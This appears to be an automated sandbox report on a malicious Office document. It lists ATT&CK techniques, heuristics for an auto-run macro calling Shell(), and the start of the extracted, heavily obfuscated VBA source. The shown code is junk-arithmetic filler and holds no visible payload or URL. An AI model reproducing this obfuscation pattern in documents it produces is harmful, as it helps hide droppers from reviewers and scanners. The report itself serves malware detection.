MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a Document_Open macro that calls the Shell() function. This indicates an intent to execute arbitrary code, most likely to download and run a secondary payload. The VBA macro code is heavily obfuscated, which prevented a more detailed analysis of its specific actions.
Heuristics (5)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42066 bytes |

SHA-256: 6c53d5612212d2c01374a58be6a7629f0a3da44b9901f8fa52074d10322365c4

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "oCorzdV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function uDlRlVhivZIL()
On Error Resume Next
If zKFjJm >= HOQzu Then
qBiKo = 183388958 + 155564576
ElseIf qaRpn < LvwQY Then
For bBUCl = 96 To 3879
OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX)
Next
bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz)
End If
If bdiwEO >= wjGuoT Then
jOmTzT = 183388958 + 155564576
ElseIf onUfmz < pNRfCr Then
For frOAR = 96 To 3879
wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU)
Next
wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH)
End If
If dllWNG >= TBpdc Then
YriaD = 183388958 + 155564576
ElseIf NjjtsF < YwoLFt Then
For YhkJH = 96 To 3879
saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC)
Next
nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz)
End If
If lMwjN >= JXWlY Then
KMVmm = 183388958 + 155564576
ElseIf EXWvzi < MfCEE Then
For tCwMcz = 96 To 3879
PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop)
Next
VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB)
End If
If Rjjfst >= cnXuZJ Then
DPDfZ = 183388958 + 155564576
ElseIf WFztn < PTzUU Then
For FYiiw = 96 To 3879
WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw)
Next
iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj)
End If
End Function
Private Function NKIlIUbQzwV()
On Error Resume Next
If HsSLR >= Gbimp Then
QJSTqd = 183388958 + 155564576
ElseIf VBfGw < zVujS Then
For dOFRE = 96 To 3879
iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH)
Next
zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH)
End If
If uwvmz >= WlmHf Then
lGULbn = 183388958 + 155564576
ElseIf DIjpZ < oWHMfY Then
For cOpwDF = 96 To 3879
oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW)
Next
RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA)
End If
If iwuAiH >= NiQlma Then
tkOTdl = 183388958 + 155564576
ElseIf cEJpQ < swdFpU Then
For VHpZD = 96 To 3879
npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT)
Next
jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY)
End If
If pCarz >= SUCoai Then
dKwvG = 183388958 + 155564576
ElseIf SRLIi < piXBw Then
For OqRcMt = 96 To 3879
lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj)
Next
urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo)
End If
If mcLcM >= GIMdfX Then
JqqpMm = 183388958 + 155564576
ElseIf jVRnr < DkRKj Then
For FHUsCz = 96 To 3879
RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf)
Next
OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL)
End If
End Function
Private Function ZNBZsodYhlDmfZ()
On Error Resume Next
If wtJqK >= ZjHSpE Then
boHjv = 183388958 + 155564576
ElseIf icWOsw < PHFSZb Then
For cIvzt = 96 To 3879
Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw)
Next
nLatZu = hajQu / QjBckT + 1126
... (truncated)